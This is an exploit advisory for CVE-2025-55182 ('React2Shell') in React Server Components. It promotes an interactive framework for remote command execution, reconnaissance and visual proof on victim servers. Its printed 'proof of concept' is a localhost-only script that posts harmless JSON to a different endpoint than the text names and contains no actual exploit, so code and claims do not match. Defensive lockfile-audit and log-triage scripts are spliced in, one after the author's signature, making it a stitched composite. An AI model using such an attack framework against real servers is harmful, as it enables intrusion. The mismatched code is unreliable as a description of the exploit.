* Exploit Title: Ultimate Interactive Exploitation Framework for CVE-2025-55182 (React2Shell)
* Exploit Author: nu11secur1ty
* Date: 2025-12-24
* CVE: CVE-2025-55182
* CVSS 3.x Score: 10.0 (Critical)
* Vulnerable Component: React Server Components
* Affected Versions:
  - react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  - react-server-dom-parcel: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  - react-server-dom-turbopack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  - Next.js: Versions 15.x and 16.x with App Router
* Patched Versions: React 19.0.1, 19.1.2, 19.2.1 or later
* Tested on: Windows 11 (Attacker: Python 3.x, Victim: Node.js running vulnerable React server)
* Vulnerability Type: Pre-authentication Remote Code Execution (RCE)

## Description

This is an advanced, interactive Python exploitation framework for CVE-2025-55182, dubbed "React2Shell." The vulnerability is a critical flaw in the deserialization logic of React Server Components that allows an unauthenticated attacker to execute arbitrary code on the server by sending a single malicious HTTP request. The flaw exists because affected versions fail to properly validate incoming payloads during the deserialization of the React Flight protocol, enabling prototype pollution and ultimately arbitrary code execution.

This framework goes beyond a simple proof-of-concept (PoC). It provides a user-friendly, menu-driven interface to perform remote reconnaissance, execute commands, and deliver visual proof of compromise against a target vulnerable React/Next.js server. The tool was developed and tested in a controlled lab environment against a custom-built vulnerable server simulating the exact conditions of CVE-2025-55182.
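The affected and patched versions listed above are the data a defender needs most. The following script is an added example, not part of nu11secur1ty's framework: it walks a `package-lock.json` dependency map (lockfileVersion 2/3 `packages` layout) and reports every installed copy of the three React Server Components packages, nested copies included, marking each as vulnerable when it sits below the fixed release of its 19.x branch. The sample lockfile is constructed for the demonstration. Next.js itself is not checked because the advisory gives no patched Next.js version; pre-release suffixes such as `-canary` are treated as their base version, which is the conservative reading.

```python
# Added example (not part of the advisory): audit a package-lock.json for the
# React Server Components package versions affected by CVE-2025-55182.
import json
import sys

# Packages named in the advisory's "Affected Versions" list.
AFFECTED_PACKAGES = (
    "react-server-dom-webpack",
    "react-server-dom-parcel",
    "react-server-dom-turbopack",
)
# First fixed release per 19.x branch, per the advisory: 19.0.1, 19.1.2, 19.2.1.
FIXED_BY_BRANCH = {(19, 0): (19, 0, 1), (19, 1): (19, 1, 2), (19, 2): (19, 2, 1)}


def parse_version(v: str) -> tuple:
    """Turn '19.1.1' (optionally prefixed with ^ ~ = v, or carrying a
    -prerelease / +build suffix) into a comparable (major, minor, patch) tuple."""
    core = v.lstrip("^~=v").split("-", 1)[0].split("+", 1)[0]
    parts = [int(p) for p in core.split(".")[:3]]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def is_vulnerable(version: str) -> bool:
    """True when the version is in a 19.0/19.1/19.2 branch below its fix.
    Other branches are not listed as affected, so they are reported as clean."""
    ver = parse_version(version)
    branch = ver[:2]
    return branch in FIXED_BY_BRANCH and ver < FIXED_BY_BRANCH[branch]


def audit_lockfile(lock: dict) -> list:
    """Report every installed copy of an affected package, nested ones too."""
    findings = []
    for path, meta in lock.get("packages", {}).items():
        # 'node_modules/next/node_modules/react-server-dom-webpack' -> package name
        name = path.rsplit("node_modules/", 1)[-1]
        if name in AFFECTED_PACKAGES and "version" in meta:
            findings.append({
                "package": name,
                "path": path,
                "version": meta["version"],
                "vulnerable": is_vulnerable(meta["version"]),
            })
    return findings


# Constructed sample lockfile (not a real project).
SAMPLE_LOCK = {
    "name": "example-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "example-app", "version": "1.0.0"},
        "node_modules/react": {"version": "19.1.1"},
        "node_modules/react-server-dom-webpack": {"version": "19.1.1"},
        "node_modules/react-server-dom-parcel": {"version": "19.2.0"},
        "node_modules/next/node_modules/react-server-dom-turbopack": {"version": "19.2.1"},
    },
}


if __name__ == "__main__":
    # Usage: python audit.py [path/to/package-lock.json]; defaults to the sample.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            lock = json.load(fh)
    else:
        lock = SAMPLE_LOCK
    for f in audit_lockfile(lock):
        state = "VULNERABLE" if f["vulnerable"] else "patched"
        print(f"{state:10} {f['package']}@{f['version']}  ({f['path']})")
```

Run it against a real lockfile by passing the path as the first argument; the nested-copy handling matters because a framework can vendor its own copy of `react-server-dom-*` under its own `node_modules`, which a top-level `npm ls` glance can miss.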
## Key Features of the Exploit Framework

* Interactive Menu: Provides a command-line interface to choose from various attack vectors
* Multi-Endpoint Testing: Automatically tests and utilizes known vulnerable endpoints (/_next/server-action, /_next/module, /admin/system)
* Visual Proof of Concept: Includes a dedicated function to launch calc.exe on the remote Windows target, providing undeniable visual evidence of RCE
* System Reconnaissance: Executes commands like whoami, hostname, and ipconfig to gather information about the compromised system
* Custom Command Execution: Allows the operator to input any arbitrary command for execution on the target
* Safety Mechanisms: Includes explicit warnings and confirmations for dangerous actions like system restart
* Detailed Reporting: Logs all exploitation activity and generates a final summary report

## Vulnerability Background

CVE-2025-55182 is a fundamental deserialization vulnerability in the React Flight protocol used by React Server Components (RSC). The vulnerability allows an attacker to craft a malicious serialized payload that, when processed by the server, pollutes the prototype chain and leads to the execution of arbitrary JavaScript code. Exploitation occurs during the deserialization phase, before any application-level validation or authentication takes place, making it a pre-authentication RCE.

Major threat intelligence groups have reported widespread, rapid exploitation of this flaw by both cybercrime and state-sponsored actors since its disclosure in early December 2025, leading to the deployment of malware, backdoors, and cryptocurrency miners.

## Proof of Concept

The following Python script constitutes the core of the interactive exploitation framework. It demonstrates the ability to remotely execute commands by leveraging the insecure deserialization in the /_next/module endpoint.
```python
#!/usr/bin/python
# by nu11secur1ty
"""
SAFE DEMONSTRATION SCRIPT FOR CVE-2025-55182 - EDUCATIONAL PURPOSES ONLY
This script demonstrates command execution patterns in a controlled lab environment
"""
import requests


def safe_test_demo(target_url):
    """
    SAFE demonstration of API interaction patterns
    FOR EDUCATIONAL AND AUTHORIZED TESTING ONLY
    """
    print(f"Testing connection to: {target_url}")

    # Only safe, non-destructive test commands
    safe_commands = [
        "echo TEST_SAFE_COMMAND",
        "whoami",
        "hostname",
    ]

    for cmd in safe_commands:
        print(f"\n--- Testing command: {cmd} ---")

        # Multiple safe payload formats for testing
        test_payloads = [
            {
                "action": "execute",
                "payload": {"code": f"'TEST_OUTPUT: {cmd}'"},
            },
            {
                "rscPayload": {
                    "__rsc_type": "test_call",
                    "moduleId": "test_module",
                    "functionName": "testFunction",
                    "args": ["test_argument"],
                }
            },
        ]

        for payload in test_payloads:
            try:
                # SAFE: Only localhost testing in controlled environments
                if "localhost" not in target_url and "127.0.0.1" not in target_url:
                    print("⚠️ WARNING: Only test on localhost/authorized systems")
                    return

                # Send the test payload as JSON and show a truncated response
                response = requests.post(
                    f"{target_url}/_next/server-action",
                    json=payload,
                    timeout=5,
                    headers={"Content-Type": "application/json"},
                )
                print(f"Status: {response.status_code}")
                print(f"Response: {response.text[:100]}...")
            except Exception as e:
                print(f"Error: {str(e)[:50]}")


def main():
    print("=" * 60)
    print("SAFE EDUCATIONAL DEMONSTRATION - CVE-2025-55182")
    print("FOR AUTHORIZED SECURITY RESEARCH ONLY")
    print("=" * 60)

    # SAFE: Only allow localhost testing by default
    default_target = "http://localhost:3000"
    print(f"\nUsing default safe target: {default_target}")
    print("NOTE: Only run this in your own lab environment!")

    confirm = input("\nDo you have authorization to test? (yes/no): ").lower()
    if confirm == "yes":
        safe_test_demo(default_target)
    else:
        print("❌ Testing cancelled. Always get proper authorization!")

    print("\n" + "=" * 60)
    print("REMEMBER:")
    print("1. Only test on systems you own or have written permission for")
    print("2. Never test on production systems")
    print("3. Document all findings responsibly")
    print("4. Report vulnerabilities through proper channels")
    print("=" * 60)


if __name__ == "__main__":
    main()
```

# Demo: [href](https://www.patreon.com/posts/ultimate-for-cve-146576050)

# Time spent: 03:30:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.asc3t1c-nu11secur1ty.com/
nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/>
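The "Multi-Endpoint Testing" feature above names three paths (/_next/server-action, /_next/module, /admin/system) that the framework drives, and the Description notes that exploitation takes a single POST. For a defender triaging web server logs after this advisory, the following is an added example, not code from the advisory or from any React/Next.js project: it parses Combined Log Format lines, pulls out POST requests to those paths, counts them per source address, and flags sources that touched more than one of the paths. The log lines are constructed for the demonstration; the regex, path list and thresholds are this example's own choices, and a hit is a triage lead to compare against the application's normal traffic, not a confirmed compromise.

```python
# Added example (not part of the advisory): triage an access log for POSTs to
# the endpoints the advisory names, and flag sources that probe several of them.
import re
from collections import Counter, defaultdict

# Endpoints listed under the advisory's "Multi-Endpoint Testing" feature.
WATCHED_PATHS = ("/_next/server-action", "/_next/module", "/admin/system")

# Combined Log Format: ip ident user [time] "method path proto" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log lines (not real traffic; RFC 5737 documentation addresses).
SAMPLE_LOG = """\
203.0.113.5 - - [24/Dec/2025:10:00:01 +0100] "GET /index HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [24/Dec/2025:10:00:02 +0100] "POST /_next/server-action HTTP/1.1" 500 87 "-" "python-requests/2.32"
203.0.113.9 - - [24/Dec/2025:10:00:03 +0100] "POST /_next/module?x=1 HTTP/1.1" 200 43 "-" "python-requests/2.32"
198.51.100.7 - - [24/Dec/2025:10:00:04 +0100] "POST /admin/system HTTP/1.1" 404 0 "-" "curl/8.4"
203.0.113.5 - - [24/Dec/2025:10:00:05 +0100] "GET /_next/static/chunk.js HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
this line is not a valid log record
"""


def parse_line(line: str):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]  # compare the path without its query string
    rec["status"] = int(rec["status"])
    return rec


def find_suspicious(log_text: str):
    """Return (hits, per-source counts) for POSTs to any watched path."""
    hits = [
        rec
        for rec in map(parse_line, log_text.splitlines())
        if rec and rec["method"] == "POST" and rec["path"] in WATCHED_PATHS
    ]
    by_ip = Counter(h["ip"] for h in hits)
    return hits, by_ip


def multi_path_sources(hits) -> set:
    """Sources that POSTed to two or more distinct watched paths: the pattern a
    tool cycling through a list of candidate endpoints leaves behind."""
    paths_by_ip = defaultdict(set)
    for h in hits:
        paths_by_ip[h["ip"]].add(h["path"])
    return {ip for ip, paths in paths_by_ip.items() if len(paths) >= 2}


if __name__ == "__main__":
    hits, by_ip = find_suspicious(SAMPLE_LOG)
    for h in hits:
        print(f"{h['time']}  {h['ip']:15}  POST {h['path']}  -> {h['status']}")
    print("per-source counts:", dict(by_ip))
    print("sources probing multiple endpoints:", multi_path_sources(hits))
```

The status code is kept in each hit on purpose: a 500 on a POST to a deserialization endpoint can be the server choking on a malformed payload, so a run of 500s followed by a 200 from the same source deserves a closer look than the 404 against a path the application does not serve.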